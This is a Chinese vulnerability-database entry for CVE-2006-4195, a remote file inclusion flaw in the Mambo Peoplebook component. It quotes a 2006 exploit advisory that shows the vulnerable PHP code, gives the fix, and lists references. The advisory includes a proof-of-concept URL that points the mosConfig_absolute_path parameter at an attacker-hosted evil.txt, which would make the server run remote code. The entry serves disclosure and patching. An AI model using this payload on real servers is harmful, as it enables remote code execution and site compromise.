Mambo Peoplebook组件中'Param.PeopleBook.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110818 漏洞类型 代码注入
发布时间 2006-08-14 更新时间 2007-10-01
CVE编号 CVE-2006-4195 CNNVD-ID CNNVD-200608-289
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/2184
https://cxsecurity.com/issue/WLB-2006080115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-289
|漏洞详情
Mambo(com_peoplebook)1.0及早期版本,可能还包括1.1.2版本的Peoplebook组件中的param.peoplebook.php脚本存在PHP远程文件包含漏洞,当register_globals和allow_url_fopen启用时,远程攻击者可借助mosConfig_absolute_path参数中的URL执行任意PHP代码。
|漏洞EXP
---------------------------------------------------------------------------
Peoplebook Mambo Component <= v1.0 Remote File Include Vulnerabilities
---------------------------------------------------------------------------

Author          : Matdhule
Date            : August, 14th 2006
Location        : Indonesia, Jakarta
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Peoplebook Component

Application     : Peoplebook Component
version         : 1.0
URL             : www.mamboforge.net/projects/peoplebook

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~

in folder com_peoplebook we found vulnerability script param.peoplebook.php.

-----------------------param.peoplebook.php----------------------
....
<?php

if (file_exists($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php')) {
   require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/'.$selected_lang.'.php');
}
else {
   require_once ($mosConfig_absolute_path.'/components/com_peoplebook/languages/english.php');
}
...
----------------------------------------------------------

Variables $mosConfig_absolute_path are not properly sanitized. When register_globals=on
and allow_fopenurl=on an attacker can exploit this vulnerability with a
simple php injection script.

Proof Of Concept:
~~~~~~~~~~~~~~~

http://[target]/[path]/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= http://attacker.com/evil.txt?

Solution:
~~~~~~~

sanitize variabel $mosConfig_absolute_path in param.peoplebook.php


---------------------------------------------------------------------------
Shoutz:
~~~~~
~ solpot a.k.a chris, J4mbi  H4ck3r for the hacking lesson :)
~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous
~ bius, lapets, ghoz, t4mbun_hacker, NpR, h4ntu, thama
~ newbie_hacker@yahoogroups.com, jasakom_perjuangan@yahoogroups.com
~ #mardongan #jambihackerlink #e-c-h-o @ irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~

     matdhule[at]gmail[dot]com
     
-------------------------------- [ EOF ] ---------------------------------- 

# milw0rm.com [2006-08-14]
|参考资料

来源:XF
名称:peoplebook-param-file-include(28359)
链接:http://xforce.iss.net/xforce/xfdb/28359
来源:BID
名称:19505
链接:http://www.securityfocus.com/bid/19505
来源:BUGTRAQ
名称:20060814PeoplebookMamboComponent<=v1.0RemoteFileIncludeVulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/443201/100/0/threaded
来源:MILW0RM
名称:2184
链接:http://www.milw0rm.com/exploits/2184
来源:VUPEN
名称:ADV-2006-3277
链接:http://www.frsirt.com/english/advisories/2006/3277
来源:SECUNIA
名称:21470
链接:http://secunia.com/advisories/21470
来源:MILW0RM
名称:2184
链接:http://milw0rm.com/exploits/2184
来源:SREASON
名称:1406
链接:http://securityreason.com/securityalert/1406